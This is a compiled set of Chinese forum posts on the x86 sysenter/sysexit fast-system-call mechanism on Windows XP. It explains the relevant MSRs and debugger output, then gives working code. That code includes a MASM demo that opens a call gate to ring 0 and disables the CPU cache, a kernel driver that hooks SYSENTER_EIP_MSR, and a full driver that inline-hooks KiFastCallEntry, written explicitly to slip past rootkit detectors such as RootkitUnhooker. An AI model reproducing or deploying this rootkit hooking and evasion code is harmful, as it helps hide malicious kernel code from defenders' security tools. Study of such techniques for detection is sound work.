在 Intel 的軟件開發者手冊第二、三卷（Vol.2B,Vol.3）中，4.8.7 節是關于 sysenter/sysexit 指令的詳細描述。手冊中說明，sysenter

指令可用于特權級 3 的用戶代碼調用特權級 0 的系統內核代碼，而 SYSEXIT 指令則用于特權級 0 的系統代碼返回用戶空間中。sysenter 指

令可以在 3，2，1 這三個特權級別調用（Linux 中只用到了特權級 3），而 SYSEXIT 指令只能從特權級 0 調用。

執行 sysenter 指令的系統必須滿足兩個條件：1.目標 Ring 0 代碼段必須是平坦模式（Flat Mode）的 4GB 的可讀可執行的非一致代碼段。

2.目標 RING0 堆棧段必須是平坦模式（Flat Mode）的 4GB 的可讀可寫向上擴展的棧段。

在 Intel 的手冊中，還提到了 sysenter/sysexit 和 int n/iret 指令的一個區別，那就是 sysenter/sysexit 指令并不成對，sysenter 指

令并不會把 SYSEXIT 所需的返回地址壓棧，sysexit 返回的地址并不一定是 sysenter 指令的下一個指令地址。調用 sysenter/sysexit 指令

地址的跳轉是通過設置一組特殊寄存器實現的。這些寄存器包括：

SYSENTER_CS_MSR － 用于指定要執行的 Ring 0 代碼的代碼段選擇符，由它還能得出目標 Ring 0 所用堆棧段的段選擇符；

SYSENTER_EIP_MSR － 用于指定要執行的 Ring 0 代碼的起始地址；

SYSENTER_ESP_MSR－用于指定要執行的Ring 0代碼所使用的棧指針

這些寄存器可以通過 wrmsr 指令來設置，執行 wrmsr 指令時，通過寄存器 edx、eax 指定設置的值，edx 指定值的高 32 位，eax 指定值的

低 32 位，在設置上述寄存器時，edx 都是 0，通過寄存器 ecx 指定填充的 MSR 寄存器，sysenter_CS_MSR、sysenter_ESP_MSR、

sysenter_EIP_MSR 寄存器分別對應 0x174、0x175、0x176，需要注意的是，wrmsr 指令只能在 Ring 0 執行。

這里還要介紹一個特性，就是 Ring0、Ring3 的代碼段描述符和堆棧段描述符在全局描述符表 GDT 中是順序排列的，這樣只需知道

SYSENTER_CS_MSR 中指定的 Ring0 的代碼段描述符，就可以推算出 Ring0 的堆棧段描述符以及 Ring3 的代碼段描述符和堆棧段描述符。

在 Ring3 的代碼調用了 sysenter 指令之后，CPU 會做出如下的操作：

1． 將 SYSENTER_CS_MSR 的值裝載到 cs 寄存器

2． 將 SYSENTER_EIP_MSR 的值裝載到 eip 寄存器

3． 將 SYSENTER_CS_MSR 的值加 8（Ring0 的堆棧段描述符）裝載到 ss 寄存器。

4． 將 SYSENTER_ESP_MSR 的值裝載到 esp 寄存器

5． 將特權級切換到 Ring0

6． 如果 EFLAGS 寄存器的 VM 標志被置位，則清除該標志

7． 開始執行指定的 Ring0 代碼

在 Ring0 代碼執行完畢，調用 SYSEXIT 指令退回 Ring3 時，CPU 會做出如下操作：

1． 將 SYSENTER_CS_MSR 的值加 16（Ring3 的代碼段描述符）裝載到 cs 寄存器

2． 將寄存器 edx 的值裝載到 eip 寄存器

3． 將 SYSENTER_CS_MSR 的值加 24（Ring3 的堆棧段描述符）裝載到 ss 寄存器

4． 將寄存器 ecx 的值裝載到 esp 寄存器

5． 將特權級切換到 Ring3

6． 繼續執行 Ring3 的代碼

由此可知，在調用 SYSENTER 進入 Ring0 之前，一定需要通過 wrmsr 指令設置好 Ring0 代碼的相關信息，在調用 SYSEXIT 之前，還要保證

寄存器edx、ecx 的正確性。

 

根據 Intel 的 CPU 手冊，我們可以通過 CPUID 指令來查看 CPU 是否支持 sysenter/sysexit 指令，做法是將 EAX 寄存器賦值 1，調用

CPUID 指令，寄存器 edx 中第 11 位（這一位名稱為 SEP）就表示是否支持。在調用 CPUID 指令之后，還需要查看 CPU 的 Family、Model、

Stepping 屬性來確認，因為據稱 Pentium Pro 處理器會報告 SEP 但是卻不支持 sysenter/sysexit 指令。只有 Family 大于等于 6，Model

大于等于 3，Stepping 大于等于 3 的時候，才能確認 CPU 支持 sysenter/sysexit 指令。

 

/=============================================================================
//在WINDBG中對NTDLL.dll中的NtCreateFile函數的調試信息
ntdll!NtCreateFile:
7c92d682 b825000000      mov     eax,25h
7c92d687 ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
7c92d68c ff12            call    dword ptr [edx]
7c92d68e c22c00          ret     2Ch

lkd> dd 7ffe0300
7ffe0300  7c92eb8b 7c92eb94 00000000 00000000

lkd> u 7c92eb8b
ntdll!KiFastSystemCall:
7c92eb8b 8bd4            mov     edx,esp
7c92eb8d 0f34            sysenter

/**************************************************************/
 
SYSENTER簡介及相關例子
 
 
文章作者：wowocock1/CVC.GB

;眾所周知微軟自XP后引進了FASTCALL SYSENTER，SYSEXIT來代替WIN2K下INT2E系統服務調用
;其優點是快速而且沒有保留堆棧的開銷，為了便于大家理解我寫下面一個在WIN98下的例子
;來說明一下這2條指令的用法。ITNEL的手冊上關于他們介紹的很詳細，我簡要說明一下
;SYSENTER是INTEL自P2后引進的快速從RING3~RING0的FASTCALL，從FAMILY 6，MODEL 3，
;STEP 3也就是從PII300以后引進的，這也是為什么WINXP需要PII300以上的原因。在使用SYSENTER
;之前必須定義好RING0 CS EIP ESP，通過設置相應MSR寄存器,由WRMSR指令來設定（必須在RING0層執行）;
;通過將相應的寄存器地址號放入ECX中，WRMSR可以設置這些MSR寄存器,對應關系如下
;SYSENTER_CS_MSR 174H SYSENTER_ESP_MSR 175H SYSENTER_EIP_MSR 176H
;執行SYSENTER指令的系統必須滿足 1：轉換后的RING0代碼段必須是FLAT，4GB的可讀可執行
;的非一致代碼段.2:轉換后的RING0堆棧段必須是FLAT，4GB的可讀可寫向上擴展的數據段
;由于FASTCALL不保存任何返回的地址，所以在調用前你必須自己設定好，RING0代碼段SELECTOR
;RING0堆棧段SELECTOR，RING3代碼段SELECTOR，RING3堆棧段SELECTOR，必須在GDT中連續的排列
;所以在XP下相應的SELECTOR，必然是8H，10H，1BH，23H，必須將返回至RING3 EIP,ESP通過寄存器
;傳遞進RING0以便SYSEXIT返回使用，在SYSEXIT返回之前，EDX為RING3 EIP，ECX為RING3 ESP
;而相應的CS，SS，則由RING0 CS加上10H，18H來返回
;RING3~RING0
;1. 裝載SYSENTER_CS_MSR 到CS 寄存器.
;2. 裝載SYSENTER_EIP_MSR到 EIP寄存器。
;3. SYSENTER_CS_MSR+8 裝載到SS寄存器
;4.裝載SYSENTER_ESP_MSR 到ESP寄存器。
;5. 切換RING0.
;6. 清除 EFLAGS的 VM標志
;7. 執行RING0例程
;RING0~RING3
;1。SYSENTER_CS_MSR+16裝載到 CS寄存器
;2. 將EDX的值送入EIP
;3. SYSENTER_CS_MSR+24 裝載到SS寄存器
;4. 將ECX的值送入ESP
;5.切換回RING3
;6. 執行EIP處的RING3指令
;下面的例子在示范的基礎上加了個小TRICK，就是在通過CALLGATE進RING0設置MSR寄存器的同時
;關掉了你機器上的緩存，然后你可以看看在沒有緩存的情況下你的感覺如何，然后點擊一下
;對話框，則經由SYSENTER指令進入RING0設定好的地址處恢復你CPU緩存，所以別擔心，還有
;沒有緩存的時候你的動作最好慢一點，不然會讓你等的發瘋的，呵呵。
.686p
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

sysenter macro
db 0fh,34h
endm

sysexit macro
db 0fh,35h
endm

CR0_CD EQU 040000000h ; Cache Disable bit of CR0
CR0_NW EQU 020000000h ; Not Write-through bit of CR0
.data
Ring0Cs dw 0ffffh,0,09b00h,0cfh
Ring0Ss dw 0ffffh,0,09300h,0cfh
Ring3Cs dw 0ffffh,0,0fb00h,0cfh
Ring3Ss dw 0ffffh,0,0f300h,0cfh

trR dw ?
tssRing0Esp dd ?
GdtLimit dw ?
GdtAddr dd ?

Callgt dq 0 ;call gate’s selff
tmpCs dw ?
szTitle db "CPU info",0
msg db 100 dup (?)
Nightmare db "切換到其他窗口，嘗嘗沒CACHE的滋味!",0

.code
Start:
mov ax,ds
test ax,4
jz Exit;winnt
xor eax,eax
cpuid
lea edi,msg
xchg eax,ebx
stosd
xchg eax,edx
stosd
xchg eax,ecx
stosd
invoke MessageBoxA,0,addr msg,addr szTitle,0
mov eax,1
cpuid
test edx,800h
jz Exit
mov eax,2
cpuid
SetSel:
sgdt GdtLimit
str word ptr trR ;存儲任務寄存器
;-----------------------
; get the tr mes
;-----------------------
movzx esi,trR
add esi,GdtAddr   ;ESi指向GDT中TSS描述副
mov eax,[esi+2]
and eax,0ffffffh
mov ebx,[esi+4]
and ebx,0ff000000h
or eax,ebx    ;eax中保存TSS的基地址

push dword ptr[eax+4]
pop dword ptr [tssRing0Esp] ;保存RING0使用的堆棧地址

movzx eax,GdtLimit ;在GDT的最后選取四個表目將預設的4個描述符存入
test al,1
jz @f
inc eax
@@:
sub eax,4*8
mov tmpCs,ax
add eax,GdtAddr
lea esi,Ring0Cs
mov edi,eax
mov ecx,4*8
rep movsb

SetMsr:
;-------------------------------------
; 在GDT中尋找空白表項來制造調用門
;-------------------------------------
mov esi,GdtAddr
movzx eax,GdtLimit
call Search_XDT
;esi==gdt Base
mov esi,dword ptr GdtAddr
push offset Ring0_SetMsr
pop word ptr [esi+eax+0]
pop word ptr [esi+eax+6] ;Offset

mov word ptr [esi+eax+2],28h
mov word ptr [esi+eax+4],0EC00h ;sel=28h and attribute ->386 call gate!

and dword ptr Callgt,0

mov word ptr [Callgt+4],ax
pushad
call fword ptr [Callgt] ;Ring0!
popad
mov dword ptr [esi+eax+0],0
mov dword ptr [esi+eax+4],0

invoke MessageBoxA,0,addr Nightmare,addr Nightmare,0
lea edx,Exit
mov ecx,esp
sysenter

Exit:
push 00000000h ; Exit program
call ExitProcess

;----------------------------------------------------------------------

Ring0_SetMsr:
mov ecx,174h
movzx eax,tmpCs
wrmsr
inc ecx
mov eax,tssRing0Esp
wrmsr
inc ecx
lea eax,Ring0Ip
wrmsr

mov eax,cr0 ; read CR0
or eax,CR0_CD ; set CD but not NW bit of CR0
mov cr0,eax ; cache is now disabled
wbinvd ; flush and invalidate cache

; the cache is effectively disabled at this point, but memory
; consistency will be maintained. To completely disable cache,
; the following two lines may used as well:

or eax,CR0_NW ; now set the NW bit
mov cr0,eax ; turn off the cache entirely

retf

;----------------------------------------------------------------------
Ring0Ip:
pushad

pushf ; save the flags
cli ; disable interrupts while we do this
mov eax,cr0 ; read CR0
and eax,0dfffffffh ; now set the NW bit
mov cr0,eax ; turn on the cache entirely

and eax,0bfffffffh ; set CD but not NW bit of CR0
mov cr0,eax ; cache is now Ensabled

popf ; restore the flags

mov eax,cr0
mov [esp+4*7],eax
popad
sysexit

;----------------------------------------------------------------------

Search_XDT proc near
;entry esi==Base of Ldt or GDT ;Eax==Limit

pushad
mov ebx,eax
mov eax,8 ; skipping null selector
@@1:
cmp dword ptr [esi+eax+0],0
jnz @@2
cmp dword ptr [esi+eax+4],0
jz @@3
@@2:
add eax,8
cmp eax,ebx
jb @@1 ;if we haven’t found any free GDT entry,
;lets use the last two entries
mov eax,ebx
sub eax,7
@@3:
mov [esp+4*7],eax ; return off in eax
popad
ret
Search_XDT endp
end Start

;=======================================================================================================
1   【原創】rootkit hook之[六] -- sysenter Hook    

--------------------------------------------------------------------------------

標 題: 【原創】rootkit hook之[六] -- sysenter Hook
作 者: combojiang
時 間: 2008-02-26,12:25
鏈 接: http://bbs.pediy.com/showthread.php?t=60247

呵呵，今天這篇內容少，比較簡單。

SYSENETER是一條匯編指令，它是在Pentium? II 處理器及以上處理器中提供的，是快速系統調用的一部分。SYSENTER/SYSEXIT這對指令專門用于實現快速調用。在這之前是采用INT 0x2E來實現的。INT 0x2E在系統調用的時候，需要進行棧切換的工作。由于Interrupt/Exception Handler的調用都是通過 call/trap/task這一類的gate來實現的，這種方式會進行棧切換，并且系統棧的地址等信息由TSS提供。這種方式可能會引起多次內存訪問 （來獲取這些切換信息），因此，從PentiumII開始，IA-32引入了新指令：SYSENTER/SYSEXIT。 有了這兩條指令，
從用戶級到特權級的堆棧以及指令指針的轉換，可以通過這一條指令來實現，并且，需要切換到的新堆棧的地址，以及相應過程的第一條指令的位置，都有一組特殊寄存器來實現，這類特殊寄存器在IA-32中稱為MSR(Model Specific Register)。這里牽涉到3個特殊寄存器：
SYSENTER_CS_MSR: New code segment selector   0x174
SYSENTER_ESP_MSR: New Stack Pointer                0x175
SYSENTER_EIP_MSR: New Instruction Pointer        0x176
這里標出的3個16進制數分別對應這3個寄存器的地址，該地址用于Kernel debug時，通過rdmsr/wrmsr指令來讀/寫這3個寄存器。步驟如下：
10.JPG
1. 裝載SYSENTER_CS_MSR 到CS 寄存器，設置目標代碼段
2. 裝載SYSENTER_EIP_MSR到 EIP寄存器，設置目標指令
3. SYSENTER_CS_MSR+8 裝載到SS寄存器 ，設置棧段
4. 裝載SYSENTER_ESP_MSR 到ESP寄存器，設置棧幀
5. 切換RING0.
6. 清除 EFLAGS的 VM標志
7. 執行RING0例程

11.JPG
1. SYSENTER_CS_MSR+16裝載到 CS寄存器
2. 將EDX的值送入EIP
3. SYSENTER_CS_MSR+24 裝載到SS寄存器
4. 將ECX的值送入ESP
5. 切換回RING3
6. 執行EIP處的RING3指令

我們在windbg中可以看看這個三個寄存器的情況，這個是我機器里的情況。
lkd> rdmsr 176
msr[176] = 00000000`8053dad0
lkd> rdmsr 175
msr[175] = 00000000`ba4e0000
lkd> rdmsr 174
msr[174] = 00000000`00000008

可以看到，我的機器里面當前SYSENTER_EIP_MSR，SYSENTER_ESP_MSR，SYSENTER_CS_MSR這三個寄存器的值。

我們在微軟公開的內核WRK中發現關于這三個寄存器的設置，其中SYSENTER_EIP_MSR設置的值是KiFastCallEntry。
代碼如下：
VOID
KiLoadFastSyscallMachineSpecificRegisters(
    IN PLONG Context
    )

/*++

Routine Description:

    Load MSRs used to support Fast Syscall/return.  This routine is
    run on all processors.

Arguments:

    None.

Return Value:

    None.

--*/

{
    PKPRCB Prcb;

    UNREFERENCED_PARAMETER (Context);

    if (KiFastSystemCallIsIA32) {

        Prcb = KeGetCurrentPrcb();

        //
        // Use Intel defined way of doing this.
        //

        WRMSR(MSR_SYSENTER_CS,  KGDT_R0_CODE);
        WRMSR(MSR_SYSENTER_EIP, (ULONGLONG)(ULONG)KiFastCallEntry);
        WRMSR(MSR_SYSENTER_ESP, (ULONGLONG)(ULONG)Prcb->DpcStack);

    }
}

看看我電腦的情況如下：
lkd> rdmsr 176
msr[176] = 00000000`8053dad0
lkd> u 8053dad0
nt!KiFastCallEntry:
8053dad0 b923000000      mov     ecx,23h
8053dad5 6a30            push    30h
8053dad7 0fa1            pop     fs
8053dad9 8ed9            mov     ds,cx
8053dadb 8ec1            mov     es,cx
8053dadd 8b0d40f0dfff    mov     ecx,dword ptr ds:[0FFDFF040h]
8053dae3 8b6104          mov     esp,dword ptr [ecx+4]
8053dae6 6a23            push    23h

下面是rootkit.com上的一個例子，這個例子有點不厚道，在你卸載的時候會bsod.我簡單修改了下，貼代碼如下：
#include "ntddk.h"

ULONG d_origKiFastCallEntry; // Original value of ntoskrnl!KiFastCallEntry

VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    _asm
    {
          mov ecx, 0x176
        xor edx,edx
        mov eax, d_origKiFastCallEntry     // Hook function address
        wrmsr                        // Write to the IA32_SYSENTER_EIP register
      }
}

// Hook function
__declspec(naked) MyKiFastCallEntry()
{
  __asm {
    jmp [d_origKiFastCallEntry]
  }
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
  theDriverObject->DriverUnload  = OnUnload;

  __asm {
            mov ecx, 0x176
        rdmsr                 // read the value of the IA32_SYSENTER_EIP register
        mov d_origKiFastCallEntry, eax
        mov eax, MyKiFastCallEntry     // Hook function address
        wrmsr                        // Write to the IA32_SYSENTER_EIP register
  }

  return STATUS_SUCCESS;
}

注意一點，大家用windbg的時候，配置symbol path,如圖：
9.JPG

后面貼上一篇墮落天才寫的文章鏈接：http://bbs.pediy.com/showthread.php?t=42705，
他inline hook 了KiFastCallEntry，采用detour方式,寫得很不錯。

 

上傳的附件 SysEnterHook.rar (973 字節, 743 次下載) 
 
;=====================================================================================================================
   【原創】另一種sysenter hook方法(繞過絕大多數的rootkit檢測工具的檢測)   

--------------------------------------------------------------------------------

標 題: 【原創】另一種sysenter hook方法(繞過絕大多數的rootkit檢測工具的檢測)
作 者: 墮落天才
時 間: 2007-04-14,11:09
鏈 接: http://bbs.pediy.com/showthread.php?t=42705

*****************************************************************************
*標題:【原創】另一種sysenter hook方法(繞過絕大多數的rootkit檢測工具的檢測)  *
*作者:墮落天才                                                              *
*日期:2007年4月14號                                                         *
*****************************************************************************

    先廢話,當初是為了繞開NP對sysenter保護而想出來的,后來發現連RootkitUnhooker都繞了.

    什么是sysenter hook我也不羅唆了,一般的攔截方法就是通過rdmsr wrmsr 兩個指令把原來的sysenter地址改成自己的sysenter地址來實現的.這種方法使用方便,但檢測也很容易.
    這里介紹的另外一種方法不改變sysenter地址,而是通過直接在原來sysenter地址里面寫跳轉代碼來實現的,這實際上跟一般的函數頭inline hook一樣.這樣rootkit檢測工具就不會認為sysenter已經改變(實際上也是沒變).
    一般的rootkit檢測工具檢測函數inline hook是通過檢測長跳轉指令0xE9的來判斷跳轉距離是不是超出函數所在的模塊范圍來確定的.但是實現跳轉我們也可以借助寄存器或變量(用變量跳轉需要涉及重定位問題,麻煩.所以一般用寄存器),這樣跳轉指令就不是0xE9了而是0xFF,這個絕大多數rootkit檢測工具是檢測不到的(包括著名的RootkitUnhooker,VICE).

    由于我們已經改變了KiFastCall函數頭,所以我們只能把原來的函數頭代碼放到另外一個地方執行(動態分配內存,當然如果不考慮兼容性硬編碼也沒問題),然后再跳轉回來.這里使用了"三級跳",大概是這個樣子.
    sysenter->KiFastCall
             JMP -> MyKiFastCall(這里進行攔截或什么的)
                    JMP -> KiFastCall head code (這里執行原來KiFastCall函數頭代碼)
                           JMP -> KiFastCall + N(已經執行指令長度)
/////////////////////////////////////////////////////////////////////////////////////////////////// 
//墮落天才
//2007年4月14日
#include<ntddk.h>
#include "OpCodeSize.h"

ULONG uSysenter;           //sysenter地址
UCHAR uOrigSysenterHead[8];//保存原來的八個字節函數頭
PUCHAR pMovedSysenterCode; //把原來的KiFastCall函數頭保存在這里
ULONG i;                   //記錄服務ID
__declspec(naked) void MyKiFastCallEntry(void)
{
  __asm{
            pop  edi     //因為用到了edi來跳轉 這里恢復
             mov  i, eax  //得到服務ID
  }
  __asm{ 
           pushad
           push fs
             push 0x30
            pop fs
  }
 
  DbgPrint("sysenter was hooked! Get service ID:%X",i); //證明自己存在

  __asm{
             pop fs
             popad   
    jmp pMovedSysenterCode //第二跳,跳轉到原來的函數頭代碼
  }
 
}
//////////////////////////////////////////////////////
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{   
  __asm{
    cli
             mov  eax,cr0
    and  eax,not 10000h
    mov  cr0,eax
  }

  memcpy((PVOID)uSysenter,uOrigSysenterHead,8);//把原來函數頭的八個字節恢復

  __asm{
    mov  eax,cr0
            or   eax,10000h
    mov  cr0,eax
    sti
  }
  ExFreePool(pMovedSysenterCode); // 釋放分配的內存
  DbgPrint("Unload sysenterHook");
}
////////////////////////////////////////////////////////

VOID HookSysenter()
{
  UCHAR  cHookCode[8] = { 0x57,          //push edi       第一跳,從KiFastCall跳到MyKiFastCallEntry.并繞過rootkit檢測工具檢測
                          0xBF,0,0,0,0,  //mov  edi,0000
                          0xFF,0xE7};    //jmp  edi

  UCHAR  JmpCode[]={0xE9,0,0,0,0};       //jmp 0000 第三跳,從KiFastCall函數頭代碼跳轉到原來KiFastCall+N

  int    nCopyLen = 0;
  int    nPos = 0;

  __asm{
          mov ecx,0x176
            rdmsr
    mov uSysenter,eax  //得到KiFastCallEntry地址
  }
  DbgPrint("sysenter:0x%08X",uSysenter);

  nPos = uSysenter;
   while(nCopyLen<8){ //我們要改寫的函數頭至少需要8字節 這里計算實際需要COPY的代碼長度 因為我們不能把一條完整的指令打斷
    nCopyLen += GetOpCodeSize((PVOID)nPos);  //參考1
    nPos = uSysenter + nCopyLen;
  }
 
  DbgPrint("copy code lenght:%d",nCopyLen);

  pMovedSysenterCode = ExAllocatePool(NonPagedPool,20);

  memcpy(uOrigSysenterHead,(PVOID)uSysenter,8);//備份原來8字節代碼

  *((ULONG*)(JmpCode+1)) = (uSysenter + nCopyLen) - ((ULONG)pMovedSysenterCode + nCopyLen)- 5;//計算跳轉地址

  memcpy(pMovedSysenterCode,(PVOID)uSysenter,nCopyLen); //把原來的函數頭放到新分配的內存
  memcpy((PVOID)(pMovedSysenterCode + nCopyLen),JmpCode,5); //把跳轉代碼COPY上去

  *((ULONG*)(cHookCode+2)) = (ULONG)MyKiFastCallEntry; //HOOK地址
 
  DbgPrint("Saved sysenter code:0x%08X",pMovedSysenterCode);
  DbgPrint("MyKiFastCallEntry:0x%08X",MyKiFastCallEntry);

  __asm{
    cli
            mov  eax,cr0
    and  eax,not 10000h
    mov  cr0,eax
  }

  memcpy((PVOID)uSysenter,cHookCode,8);//把改寫原來函數頭

  __asm{
    mov  eax,cr0
            or   eax,10000h
    mov  cr0,eax
    sti
  }

}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegistryPath)
{

  DbgPrint("Welcome to sysenterhook.sys");
  DriverObject->DriverUnload = OnUnload;
  HookSysenter();
  return STATUS_SUCCESS;
}   
///////////////////////////////////////////////////////////////////////////////////////////////////
以上代碼在 XP SP2中文 + RootkitUnhooker下測試通過

同理 IDT hook也可以用這種方法實現,HOOK的實質是改變程序流程,無論在哪里改變
*************************************************************************************************
參考1, 海風月影,【分享】西褲哥的 Hook Api Lib 0.2 For C 

;http://bbs.pediy.com/showthread.php?p=420864